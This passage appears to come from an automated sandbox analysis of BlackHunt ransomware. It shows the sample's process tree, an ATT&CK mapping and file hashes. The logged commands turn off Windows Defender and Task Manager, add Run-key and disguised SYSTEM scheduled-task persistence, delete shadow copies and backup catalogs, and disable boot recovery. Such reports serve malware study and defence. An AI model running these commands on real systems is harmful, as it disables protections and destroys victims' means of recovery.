C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:1436
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:988
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1472
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1280
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2512
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:536
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1796
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:796
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:276
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2076
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2328
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe" /F2⤵PID:2856
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe" /F3⤵
- Creates scheduled task(s)
PID:2864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2756
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2608
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1708
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1716
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2620
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1224
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2192
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3024
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3048
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1616
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1936
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2824
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2844
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD585bc0dc9874a7bb3be13a1df00f5881c
SHA179d6e1c0738bf887f25b2e8f2336432c6a1ce14f
SHA2568c363beba852daa5c0673f6509832ed292de09d05c614459862e4472c8764da5
SHA512e46935c0dc5f551e3c5c5fd1535672c95049a3b41e0aac1ed2e5cf03462fa5b973c49a4c1b581aaf6f1717163b7b7d3efce732b8dec0efe3da0c52058cb7fae1
-
Filesize
12KB
MD53dcc3a07bcebf33888ea464a371497a4
SHA17c8d700bd534fabdf52ef83b93656ac67c216ed8
SHA256f3a9cff0e6a93af6ff45604e0ec1142bb94ee5ed898f422e9fc8919206662904
SHA5124b07d926a64db4b941e9ad3ecf158d1f4203687457e72d9f322275c48fa03ba04a12d2db42ee02cc226d753ff313249e5ff28ad1982ddcab3799ca02141ff2a4
-
Filesize
684B
MD549ef359f47c57fb23df230392cf9fedc
SHA1ae8f04b0052a51932da4b22ef0f4032f360ace51
SHA256aaee97f31ca8b741783d5df93c51b7c89810bd76df488039063325040242f95f
SHA512a18e4e1a9e84756d27027dc8ffdb09b4dcbdffab0fa278250c730fe3f8c64aa81d91b7a0b7e51e8ecd3b84216696e244a0874f5069abb1ad6ce3b82922d34910